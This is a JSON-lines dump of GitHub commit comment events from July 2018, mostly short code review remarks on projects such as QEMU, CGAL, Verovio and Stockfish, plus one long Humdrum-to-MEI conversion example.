{"id":"7911114167","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29577255,"position":278,"line":514,"path":"tests/qgraph/test-qgraph.c","commit_id":"1bcb88e173970ab3e1c2362ee631e64691b1eb02","created_at":"2018-07-03T08:45:34Z","updated_at":"2018-07-03T08:45:34Z","author_association":"NONE","body":"Do the tests really need a QEMU binary?\r\n\r\nIf not, you can just place the `g_test_add_func` calls from `test_actual_graph();` here (maybe renamed to `add_tests_on_actual_graph()`). The `qos_graph_init`/`module_call_init` can be moved inside the test functions (and then the test functions need a `qos_graph_destroy` too)."}},"created_at":"2018-07-03T08:45:34Z"}
{"id":"7911115765","type":"CommitCommentEvent","actor":{"login":"king4k1"},"repo":{"name":"king4k1/kma-ggplot"},"payload":{"comment":{"id":29577260,"position":null,"line":null,"path":null,"commit_id":"32a7b2391f2040314a1adeaefa7b5ec410d0e2ec","created_at":"2018-07-03T08:45:51Z","updated_at":"2018-07-03T08:45:51Z","author_association":"OWNER","body":"http://www.hankookilbo.com/v/866ebad5c4f949ee9df1ced2833caf26\r\n\r\n교통사고 - 추울때가 눈비올때보다 많이 발생한다."}},"created_at":"2018-07-03T08:45:51Z"}
{"id":"7911119871","type":"CommitCommentEvent","actor":{"login":"modulesio"},"repo":{"name":"webmixedreality/exokit"},"payload":{"comment":{"id":29577270,"position":null,"line":null,"path":null,"commit_id":"8f13120b558d50be8b77686a47c69ed91b293542","created_at":"2018-07-03T08:46:39Z","updated_at":"2018-07-03T08:46:39Z","author_association":"MEMBER","body":"I think it was me with the new `HTMLLinkElement`. ;)"}},"created_at":"2018-07-03T08:46:39Z"}
{"id":"7911120919","type":"CommitCommentEvent","actor":{"login":"jperedadnr"},"repo":{"name":"abhinayagarwal/MyDevoxxGluon"},"payload":{"comment":{"id":29577273,"position":6,"line":32,"path":"DevoxxClientMobile/build.gradle","commit_id":"1c9cb6d1df770d0f2acd6c4ea2e6057a3a7f16f4","created_at":"2018-07-03T08:46:50Z","updated_at":"2018-07-03T08:46:50Z","author_association":"NONE","body":"I've checked it out, but it doesn't work. It seems notch features are only under branch 9.0.0. \r\nAnyway, I see that the Drawer hasn't been updated. "}},"created_at":"2018-07-03T08:46:50Z"}
{"id":"7911127412","type":"CommitCommentEvent","actor":{"login":"rneurink"},"repo":{"name":"rneurink/Ultimaker2Marlin"},"payload":{"comment":{"id":29577285,"position":null,"line":null,"path":null,"commit_id":"64bcdd6f360674a70c79fee844bccbd37d601b75","created_at":"2018-07-03T08:48:04Z","updated_at":"2018-07-03T08:48:04Z","author_association":"OWNER","body":"You haven't attached an image. Can you try again? "}},"created_at":"2018-07-03T08:48:04Z"}
{"id":"7911127542","type":"CommitCommentEvent","actor":{"login":"king4k1"},"repo":{"name":"king4k1/kma-ggplot"},"payload":{"comment":{"id":29577287,"position":null,"line":null,"path":null,"commit_id":"32a7b2391f2040314a1adeaefa7b5ec410d0e2ec","created_at":"2018-07-03T08:48:06Z","updated_at":"2018-07-03T08:48:06Z","author_association":"OWNER","body":"기상에 따른 렌터카 취소 , 운전기피, 특정 다른 이유에따라 교통사고가 적을수도..\r\n\r\n--> 기상상태에 따른 교통사고 발생률 비교 정도 포함되면 좋을듯 "}},"created_at":"2018-07-03T08:48:06Z"}
{"id":"7911133074","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29577301,"position":null,"line":null,"path":null,"commit_id":"d2580c9599b9328c76922a723f2aabac99d094c5","created_at":"2018-07-03T08:49:07Z","updated_at":"2018-07-03T08:49:07Z","author_association":"CONTRIBUTOR","body":"This commit implements above/below placement of sforzandos in the Humdrum-to-MEI converter.  This is related to issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/120 where there more discussion related to this commit.\r\n\r\nTest example:\r\n\r\n<img width=\"1364\" alt=\"screen shot 2018-07-03 at 10 12 42 am\" src=\"https://user-images.githubusercontent.com/3487289/42207440-3246801c-7eaa-11e8-8366-7c6412a1bd64.png\">\r\n\r\nThe top staff shows the behavior with the presence of lyrics (red text) and the bottom staff without lyrics.  The first measure does not specify a placement and it is left up to the rendering program (verovio in this case).  When there are lyrics present under a staff, the Humdrum-to-MEI converter forces all automatic placement dynamics above the staff.\r\n\r\nThe second and third measures show how the RDF placement signifiers force the sforzando above or below the staff.  In  both verse/non-verse cases the behavior is the same since the explicit placement will not be overridden by automatic placement due to the presence of lyrics.\r\n\r\nThe fourth and fifth measures show similar behavior when the placement is expressed via layout parameters.\r\n\r\nThe sixth measure shows how the sforzandos are placed in the context of single/multiple layers.  In this case the first half of the measure is treated like a single layer measure, so the sforzando is placed above/below automatically depending on the presence of lyrics.  When there are two (or more) layers, the first layer's `sf` will be explicitly placed above the staff and the second layer's `sf` will be explicitly placed below the staff.  If there are more layers, then the `sf` will be placed automatically according to the renderer for the higher-numbered layers.\r\n\r\n\r\nHumdrum input data:\r\n\r\n```\r\n**kern\t**kern\t**vdata\r\n*M4/4\t*M4/4\t*\r\n*clefG2\t*clefG2\t*\r\n*\t*\t*color:red\r\n=1\t=1\t=\r\n!LO:TX:a:t=Without lyrics&colon;\t!LO:TX:a:t=With lyrics&colon;\t!\r\n1cz\t1cz\tauto\r\n=2||\t=2||\t=||\r\n1cz>\t1cz>\tabove\r\n=3\t=3\t=\r\n1cz<\t1cz<\tbelow\r\n=4||\t=4||\t=||\r\n!LO:DY:a\t!LO:DY:a\t!\r\n1cz\t1cz\tabove\r\n=5\t=5\t=\r\n!LO:DY:b\t!LO:DY:b\t!\r\n1cz\t1cz\tbelow\r\n=6||\t=6||\t=||\r\n2eez\t2eez\tauto\r\n*^\t*^\t*\r\n2eez\t2ez\t2eez\t2ez\tauto\r\n*v\t*v\t*\t*\t*\r\n*\t*v\t*v\t*\r\n==\t==\t==\r\n*-\t*-\t*-\r\n!!!RDF**kern: > = above\r\n!!!RDF**kern: < = below\r\n```\r\n\r\nMEI output:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-03T10:18:49\" version=\"2.0.0-dev-f99f5ee\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n        <extMeta>\r\n            <frames xmlns:humxml=\"http://www.humdrum.org/ns/humxml\">\r\n                <metaFrame n=\"25\" token=\"!!!RDF**kern: &gt; = above\" xml:id=\"loc25\">\r\n                    <frameInfo>\r\n                        <startTime float=\"24\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>&gt; = above</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n                <metaFrame n=\"26\" token=\"!!!RDF**kern: &lt; = below\" xml:id=\"loc26\">\r\n                    <frameInfo>\r\n                        <startTime float=\"24\" />\r\n                        <frameType>reference</frameType>\r\n                        <referenceKey>RDF**kern</referenceKey>\r\n                        <referenceValue>&lt; = below</referenceValue>\r\n                    </frameInfo>\r\n                </metaFrame>\r\n            </frames>\r\n        </extMeta>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000773130246\">\r\n                <score xml:id=\"score-0000001723980172\">\r\n                    <scoreDef xml:id=\"scoredef-0000000555475965\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000000114967673\" symbol=\"brace\" barthru=\"true\">\r\n                            <staffDef xml:id=\"staffdef-0000001347664742\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"4\" meter.unit=\"4\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001187824273\" />\r\n                            </staffDef>\r\n                            <staffDef xml:id=\"staffdef-0000001230904258\" clef.shape=\"G\" clef.line=\"2\" meter.count=\"4\" meter.unit=\"4\" n=\"2\" lines=\"5\" />\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L5\" right=\"dbl\" n=\"1\">\r\n                            <staff xml:id=\"staff-L5F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L5F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F2\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L7F3\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L7F3\">auto</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L5F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L5F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L7F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L7F2\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dir xml:id=\"dir-L7F2\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000002133635589\" fontstyle=\"normal\">With lyrics:</rend>\r\n                            </dir>\r\n                            <dynam xml:id=\"dynam-L7F1\" staff=\"2\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dir xml:id=\"dir-L7F1\" place=\"above\" staff=\"2\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000057238902\" fontstyle=\"normal\">Without lyrics:</rend>\r\n                            </dir>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L8\" n=\"2\">\r\n                            <staff xml:id=\"staff-L8F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L8F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F2\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L9F3\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L9F3\">above</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L8F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L8F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L9F2\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L9F1\" place=\"above\" staff=\"2\" tstamp=\"1.000000\">sf</dynam>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L10\" right=\"dbl\" n=\"3\">\r\n                            <staff xml:id=\"staff-L10F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L10F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L11F2\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L11F3\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L11F3\">below</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L10F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L10F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L11F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L11F2\" place=\"below\" staff=\"1\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L11F1\" place=\"below\" staff=\"2\" tstamp=\"1.000000\">sf</dynam>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L12\" n=\"4\">\r\n                            <staff xml:id=\"staff-L12F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L12F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L14F2\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L14F3\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L14F3\">above</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L12F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L12F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L14F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L14F2\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L14F1\" place=\"above\" staff=\"2\" tstamp=\"1.000000\">sf</dynam>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L15\" right=\"dbl\" n=\"5\">\r\n                            <staff xml:id=\"staff-L15F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L15F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L17F2\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L17F3\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L17F3\">below</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L15F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L15F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L17F1\" dur=\"1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L17F2\" place=\"below\" staff=\"1\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L17F1\" place=\"below\" staff=\"2\" tstamp=\"1.000000\">sf</dynam>\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L18\" right=\"end\" n=\"6\">\r\n                            <staff xml:id=\"staff-L18F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L18F2N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L19F2\" dur=\"2\" oct=\"5\" pname=\"e\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L19F3\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L19F3\">auto</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L21F3\" dur=\"2\" oct=\"5\" pname=\"e\" stem.len=\"5.500000\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L21F5\" color=\"red\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L21F5\">auto</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L21F4N2\" n=\"2\">\r\n                                    <space xml:id=\"space-0000000806646547\" dur=\"2\" />\r\n                                    <note xml:id=\"note-L21F4\" dur=\"2\" oct=\"4\" pname=\"e\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L18F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L18F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L19F1\" dur=\"2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L21F1\" dur=\"2\" oct=\"5\" pname=\"e\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L21F2N2\" n=\"2\">\r\n                                    <space xml:id=\"space-0000000656357868\" dur=\"2\" />\r\n                                    <note xml:id=\"note-L21F2\" dur=\"2\" oct=\"4\" pname=\"e\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dynam xml:id=\"dynam-L19F2\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L21F3\" place=\"above\" staff=\"1\" tstamp=\"3.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L21F4\" place=\"below\" staff=\"1\" tstamp=\"3.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L19F1\" staff=\"2\" tstamp=\"1.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L21F1\" place=\"above\" staff=\"2\" tstamp=\"3.000000\">sf</dynam>\r\n                            <dynam xml:id=\"dynam-L21F2\" place=\"below\" staff=\"2\" tstamp=\"3.000000\">sf</dynam>\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```\r\n"}},"created_at":"2018-07-03T08:49:07Z"}
{"id":"7911133807","type":"CommitCommentEvent","actor":{"login":"raphielscape"},"repo":{"name":"KudProject/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29577302,"position":null,"line":null,"path":null,"commit_id":"d14367a84dab6858d715a24df3f9f3ea0076bff5","created_at":"2018-07-03T08:49:14Z","updated_at":"2018-07-03T08:49:14Z","author_association":"NONE","body":"But did we even use dm-verity? 🤔"}},"created_at":"2018-07-03T08:49:14Z"}
{"id":"7911135721","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577303,"position":573,"line":754,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:49:35Z","updated_at":"2018-07-03T08:49:35Z","author_association":"NONE","body":"// eslint-disable-line no-param-reassign\r\n"}},"created_at":"2018-07-03T08:49:35Z"}
{"id":"7911136415","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29577305,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T08:49:43Z","updated_at":"2018-07-03T08:49:43Z","author_association":"NONE","body":"Congrats too! A nice one!\r\n\r\nI would propose to simplify the code by omitting the isCap parameter of update_capture_stats and instead check for capture/promotion directly there:\r\n\r\n```\r\nif(pos.capture_or_promotion(move))\r\n\t  captureHistory[moved_piece][to_sq(move)][captured] << bonus;\r\n```\r\n"}},"created_at":"2018-07-03T08:49:43Z"}
{"id":"7911136702","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577308,"position":98,"line":98,"path":"lib/redis/props/helper.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:49:46Z","updated_at":"2018-07-03T08:49:46Z","author_association":"NONE","body":"这个也没用了吧"}},"created_at":"2018-07-03T08:49:46Z"}
{"id":"7911139924","type":"CommitCommentEvent","actor":{"login":"ngph1"},"repo":{"name":"ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609"},"payload":{"comment":{"id":29577312,"position":null,"line":null,"path":null,"commit_id":"6af40874f51706d41baaca9d25ed50b492f56710","created_at":"2018-07-03T08:50:21Z","updated_at":"2018-07-03T08:50:21Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ada15128-1189-488e-a2d8-e35d9e878577?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702091319609\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/fc2b99ed-f195-4a70-9b20-62316c9f9855?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702091319609\") deployed [sample-cloud-native-toolchain-tutorial-20180702091319609](https://github.com/ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609/releases/tag/deploy-ibm-yp-us-south-PH-DP-Org-prod-20180703-085020 \"deploy-ibm-yp-us-south-PH-DP-Org-prod-20180703-085020\") to [prod](https://console.bluemix.net/apps/061fc3f3-2fa2-437d-8ad4-1c736ee8046f?env_id=ibm:yp:us-south \"ibm:yp:us-south:PH DP Org:prod\"), including this commit"}},"created_at":"2018-07-03T08:50:21Z"}
{"id":"7911141991","type":"CommitCommentEvent","actor":{"login":"clienthax"},"repo":{"name":"MinecraftPortCentral/GriefPrevention"},"payload":{"comment":{"id":29577317,"position":53,"line":133,"path":"src/main/java/me/ryanhamshire/griefprevention/listener/EntityEventHandler.java","commit_id":"7d8b71d363852dfed7a0d419797185e5a4d399c1","created_at":"2018-07-03T08:50:45Z","updated_at":"2018-07-03T08:50:45Z","author_association":"COLLABORATOR","body":"Seems this line is duplicated below ?"}},"created_at":"2018-07-03T08:50:45Z"}
{"id":"7911143340","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577321,"position":491,"line":682,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:50:59Z","updated_at":"2018-07-03T08:50:59Z","author_association":"NONE","body":"next line:\r\n\r\n`let {name} = phw[k];`"}},"created_at":"2018-07-03T08:50:59Z"}
{"id":"7911144487","type":"CommitCommentEvent","actor":{"login":"smaret"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29577323,"position":null,"line":null,"path":null,"commit_id":"7b01e2b7d6821bb48b9bc8c622af74d735e44a63","created_at":"2018-07-03T08:51:12Z","updated_at":"2018-07-03T08:51:12Z","author_association":"CONTRIBUTOR","body":"Thanks for the suggestion @knedlsepp , I'll give it a shot."}},"created_at":"2018-07-03T08:51:12Z"}
{"id":"7911145273","type":"CommitCommentEvent","actor":{"login":"likaiyuaiting"},"repo":{"name":"likaiyuaiting/gnosis"},"payload":{"comment":{"id":29577325,"position":null,"line":null,"path":null,"commit_id":"58941c7381330bd20efe78d08feaaeb6136867d6","created_at":"2018-07-03T08:51:22Z","updated_at":"2018-07-03T08:51:22Z","author_association":"OWNER","body":"不热"}},"created_at":"2018-07-03T08:51:22Z"}
{"id":"7911147185","type":"CommitCommentEvent","actor":{"login":"tadadell0722"},"repo":{"name":"tadadell0722/awesome"},"payload":{"comment":{"id":29577328,"position":4,"line":9,"path":"test.html","commit_id":"ecb62834e68abf4859589c05c2f9e3c58f2745d4","created_at":"2018-07-03T08:51:44Z","updated_at":"2018-07-03T08:51:44Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-03T08:51:44Z"}
{"id":"7911148962","type":"CommitCommentEvent","actor":{"login":"yairchu"},"repo":{"name":"WeAreROLI/JUCE"},"payload":{"comment":{"id":29577334,"position":688,"line":1591,"path":"modules/juce_opengl/opengl/juce_OpenGLGraphicsContext.cpp","commit_id":"0d1c72f0b13e85865ca5cee9d9d517a3945f632a","created_at":"2018-07-03T08:52:03Z","updated_at":"2018-07-03T08:52:03Z","author_association":"NONE","body":"Why would you disable textures here? Both branches of `if (maskArea != nullptr)` call `activeTextures.setTexturesEnabled` so this seems redundant?\r\n\r\nIn profiling testing my app this call causes unnecessary ShaderQuadQueue::flush calls (which slows down my rendering)."}},"created_at":"2018-07-03T08:52:03Z"}
{"id":"7911149335","type":"CommitCommentEvent","actor":{"login":"jperedadnr"},"repo":{"name":"abhinayagarwal/MyDevoxxGluon"},"payload":{"comment":{"id":29577336,"position":5,"line":14,"path":"build.gradle","commit_id":"1c9cb6d1df770d0f2acd6c4ea2e6057a3a7f16f4","created_at":"2018-07-03T08:52:09Z","updated_at":"2018-07-03T08:52:09Z","author_association":"NONE","body":"VideoService changed, resources (mp4) have to be in src/main/resources now. "}},"created_at":"2018-07-03T08:52:09Z"}
{"id":"7911151928","type":"CommitCommentEvent","actor":{"login":"sloriot"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":29577339,"position":17,"line":21,"path":"Convex_hull_3/doc/Convex_hull_3/CGAL/Extreme_points_traits_adapter_3.h","commit_id":"276871d70884127af080061f8fcf9422868900b9","created_at":"2018-07-03T08:52:36Z","updated_at":"2018-07-03T08:52:36Z","author_association":"MEMBER","body":"`Base_traits = Default`"}},"created_at":"2018-07-03T08:52:36Z"}
{"id":"7911152794","type":"CommitCommentEvent","actor":{"login":"sloriot"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":29577341,"position":32,"line":53,"path":"Convex_hull_3/doc/Convex_hull_3/CGAL/Extreme_points_traits_adapter_3.h","commit_id":"276871d70884127af080061f8fcf9422868900b9","created_at":"2018-07-03T08:52:46Z","updated_at":"2018-07-03T08:52:46Z","author_association":"MEMBER","body":"`traits = Base_traits()`"}},"created_at":"2018-07-03T08:52:46Z"}
{"id":"7911157946","type":"CommitCommentEvent","actor":{"login":"sloriot"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":29577345,"position":19,"line":244,"path":"Convex_hull_3/include/CGAL/Extreme_points_traits_adapter_3.h","commit_id":"276871d70884127af080061f8fcf9422868900b9","created_at":"2018-07-03T08:53:43Z","updated_at":"2018-07-03T08:53:43Z","author_association":"MEMBER","body":"have an overload without `Base_traits`"}},"created_at":"2018-07-03T08:53:43Z"}
{"id":"7911162028","type":"CommitCommentEvent","actor":{"login":"sloriot"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":29577355,"position":5,"line":71,"path":"Convex_hull_3/include/CGAL/convex_hull_3.h","commit_id":"276871d70884127af080061f8fcf9422868900b9","created_at":"2018-07-03T08:54:29Z","updated_at":"2018-07-03T08:54:29Z","author_association":"MEMBER","body":"I'm surprised the forward declaration does not need the default."}},"created_at":"2018-07-03T08:54:29Z"}
{"id":"7911164193","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577357,"position":465,"line":639,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:54:53Z","updated_at":"2018-07-03T08:54:53Z","author_association":"NONE","body":"below use expressions like `pos = cy > 0 ? 2 : 4;`"}},"created_at":"2018-07-03T08:54:53Z"}
{"id":"7911164872","type":"CommitCommentEvent","actor":{"login":"yuq"},"repo":{"name":"harishkrupo/external-mesa"},"payload":{"comment":{"id":29577358,"position":26,"line":1706,"path":"src/egl/drivers/dri2/egl_dri2.c","commit_id":"77dccee24134d9a59c8916fe4dcd734babbad412","created_at":"2018-07-03T08:55:01Z","updated_at":"2018-07-03T08:55:01Z","author_association":"NONE","body":"Maybe this extension is not needed for intel GPU which support EGL_EXT_buffer_age. This extension is for tile buffer GPU like mali."}},"created_at":"2018-07-03T08:55:01Z"}
{"id":"7911165302","type":"CommitCommentEvent","actor":{"login":"laho"},"repo":{"name":"MikaelSvenn/EMA"},"payload":{"comment":{"id":29577359,"position":5,"line":5,"path":"api/src/route/randomDelay.js","commit_id":"54dc99fee9f3d54bf2f8b7f25a2b05819fd8c4d5","created_at":"2018-07-03T08:55:06Z","updated_at":"2018-07-03T08:55:06Z","author_association":"NONE","body":"`delay` can never be greater than 200."}},"created_at":"2018-07-03T08:55:06Z"}
{"id":"7911170131","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29577366,"position":null,"line":null,"path":null,"commit_id":"51e1c55cad4af641a5dc14e5a3d08371559380f6","created_at":"2018-07-03T08:55:58Z","updated_at":"2018-07-03T08:55:58Z","author_association":"NONE","body":"You should avoid committing `node_modules`. Using `.gitignore` for that. \r\nhttps://github.com/b9lab/b9_faucet/blob/master/.gitignore"}},"created_at":"2018-07-03T08:55:58Z"}
{"id":"7911172763","type":"CommitCommentEvent","actor":{"login":"zhanglingyu520"},"repo":{"name":"zhanglingyu520/Tuseday"},"payload":{"comment":{"id":29577377,"position":null,"line":null,"path":null,"commit_id":"89cb655ed3ea287b5b775fce2d3591ba36032066","created_at":"2018-07-03T08:56:27Z","updated_at":"2018-07-03T08:56:27Z","author_association":"OWNER","body":"hijjhghgjj"}},"created_at":"2018-07-03T08:56:27Z"}
{"id":"7911173652","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29577379,"position":8,"line":6,"path":"migrations/2_deploy_contracts.js","commit_id":"e7af14ff03d1bf7fe93c7e9a62399a3433d9a86e","created_at":"2018-07-03T08:56:37Z","updated_at":"2018-07-03T08:56:37Z","author_association":"NONE","body":"Can you indent so it is readable?"}},"created_at":"2018-07-03T08:56:37Z"}
